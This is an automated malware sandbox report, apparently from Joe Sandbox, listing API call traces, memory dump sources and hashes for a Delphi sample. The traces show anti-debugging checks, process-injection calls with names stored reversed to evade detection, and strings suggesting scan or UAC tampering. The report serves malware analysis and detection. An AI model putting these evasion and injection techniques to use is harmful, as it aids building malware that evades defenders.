• RegQueryValueExA.ADVAPI32(?,02CF5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02CF5BD1,?,80000001), ref: 02CF5BA9
• RegCloseKey.ADVAPI32(?,02CF5BD8,00000000,?,?,00000000,02CF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CF5BCB
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CF5BE8
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02CF5BF5
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02CF5BFB
                                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02CF5C26
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CF5C6D
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CF5C7D
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CF5CA5
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CF5CB5
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02CF5CDB
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02CF5CEB
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                                                                                                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 08f5ee5d6c0489a190a7eed401d67552f6b5bd956b0d09f8f2c6d4ab927f4a0b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 639382673b3395733b9079907c1fa9f034440f00c740aa21ed4b5c9b1604c7bc
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08f5ee5d6c0489a190a7eed401d67552f6b5bd956b0d09f8f2c6d4ab927f4a0b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8851C971A4025C7EFBE5D7E48C46FEF77AD9B04380F4401A1AB05E6181D7B59B449F60

Control-flow Graph (function at 02D0894C: LoadLibraryW, GetProcAddress, FreeLibrary; graph image not reproduced)

APIs
• LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
  • Part of subcall function 02D07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912
• Opcode ID: 68beaa5b01ec77aff22bd0af12cea95a3be2ed23d33c60901cf241875b8c8134
• Instruction ID: bf3a67d289f5ad329290a5480ef5a70f1be8f144285db99e74fe735cc7715f26
• Opcode Fuzzy Hash: 68beaa5b01ec77aff22bd0af12cea95a3be2ed23d33c60901cf241875b8c8134
• Instruction Fuzzy Hash: 5AF0AFB1EC03049EF350A668F889F57B79C978071CF000D29B9A88B380E6781C58DF60

Control-flow Graph (function at 02D0F744: GetModuleHandleW, GetProcAddress, CheckRemoteDebuggerPresent; graph image not reproduced)

APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 02D0F754
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02D0F766
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02D0F77D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e249136cd2247cc98066e636cf405416b640b71d808d87c0315e79f07f52cc98
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8576e007ae3833ae347282ff818ace80781e087e1f9f741429734cd366db9780
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e249136cd2247cc98066e636cf405416b640b71d808d87c0315e79f07f52cc98
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0F0EC70904248BEEB20A7F88CC87DCFBB99B45329F3447D1D435626E1EB752A45CA52

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02CF4F2E
                                                                                                                                                                                                                                                                                                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DE40), ref: 02D0DDAB
                                                                                                                                                                                                                                                                                                                                                      • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D0DE40), ref: 02D0DDDB
                                                                                                                                                                                                                                                                                                                                                      • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D0DDF0
                                                                                                                                                                                                                                                                                                                                                      • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D0DE1C
                                                                                                                                                                                                                                                                                                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D0DE25
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4C60: SysFreeString.OLEAUT32(02D0F4A4), ref: 02CF4C6E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1897104825-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a60365f62b4171109737e6b0683329384715beb3866cc8ddb61a53dd763ac4d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4b52bf7f8c4ceb8c6bc9b85fcb285f10ca94c12bac15e6fd5edb004ff12eff5f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a60365f62b4171109737e6b0683329384715beb3866cc8ddb61a53dd763ac4d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D21D371A40308BAEB51EAD4CC92FDF77BDEB48700F510462B700F72D0DA74AA059BA4

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D0E5F6
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CheckConnectionInternet
                                                                                                                                                                                                                                                                                                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3847983778-3852638603
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 50f9b8db45cd4c2957af835d6df2bbea7d419e30332cd93f27c0299823114488
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5e919ef7da185908069fae23cba1820416520d00e9e25f3a2fb3891cbea64d09
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50f9b8db45cd4c2957af835d6df2bbea7d419e30332cd93f27c0299823114488
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2412135B001499BEB98EBA4E881FDFB3BAEF88700F504825E641E7391DA30AD05DF55

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02CF4F2E
                                                                                                                                                                                                                                                                                                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DD5E), ref: 02D0DCCB
                                                                                                                                                                                                                                                                                                                                                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D0DD05
                                                                                                                                                                                                                                                                                                                                                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D0DD32
                                                                                                                                                                                                                                                                                                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D0DD3B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: 8c876a9ca3c9c548f00393a3a264a4642fe9a9a4acf3291d84be44ea5b6c1a31
• Instruction ID: 27510a333aa0f4da4bd63cbe950c5d0a09504b45a2fb3dd9e583b9fe9e45b5d9
• Opcode Fuzzy Hash: 8c876a9ca3c9c548f00393a3a264a4642fe9a9a4acf3291d84be44ea5b6c1a31
• Instruction Fuzzy Hash: 0421BE71A40208BAEB60EAD4DD82FDEB7BDEB04B00F514462B704F72D0D7B4AE059A64
APIs
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
  • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D07A9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: c614c7939f309ee877e7b805e8d8e84184bfa44884dc5b78265002e0dd999564
• Instruction ID: b1d503da8d6dcf0acfe97c4371f370891421b7bb5a8089941fd3a7fd4de510a7
• Opcode Fuzzy Hash: c614c7939f309ee877e7b805e8d8e84184bfa44884dc5b78265002e0dd999564
• Instruction Fuzzy Hash: CF115E75644208BFFB54EFA5EC81FAEB7AEEB48700F504460BA04DB350E634AE04DB64
APIs
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
  • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D07A9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: 06d732347d54e581fccbdca0df8943387581d1af6500709a38caa855eb1da365
• Instruction ID: a13db3418c44ff40f6613c7d9827a86ac86c9d0277c9965f37eb1394cf4c1647
• Opcode Fuzzy Hash: 06d732347d54e581fccbdca0df8943387581d1af6500709a38caa855eb1da365
• Instruction Fuzzy Hash: D1115E75644208BFFB54EFA5EC81FAEB7AEEB48700F504460BA04DB350D634AE04DB64
APIs
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
  • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D08471
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: HandleModule$AddressProc$MemoryReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN
• API String ID: 2521977463-737317276
• Opcode ID: a5b6f5b100773bf4c34860475b1e6a2e7aff538904a9bf2c719679a3e7571a2b
• Instruction ID: 31ed9d91d3942aa720aaabab6d90bfe3204420d76d24bd0686dc5c217e6d163d
• Opcode Fuzzy Hash: a5b6f5b100773bf4c34860475b1e6a2e7aff538904a9bf2c719679a3e7571a2b
• Instruction Fuzzy Hash: 24012975640308AFEB94EFA8EC81F9AB7AEEB49700F514860FA04D7790D674ED149B24
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2719805696-3542721025
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f46e8d3d209aa56ecaf373c9619af411ec886c9fd60d1d6b2d97a022b8f76b19
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: be2721e74c177dd1eaac4b2ea78e63ff646dedf4d02fa63f71b80c9416c6947d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f46e8d3d209aa56ecaf373c9619af411ec886c9fd60d1d6b2d97a022b8f76b19
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69012975740209AFEB54EFA8EC81F9BB7EEEB49700F504850BA04DB7A0D634AD149B64
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 02D086D5
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                                                                                                                                                                                                                                      • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3503870465-2520021413
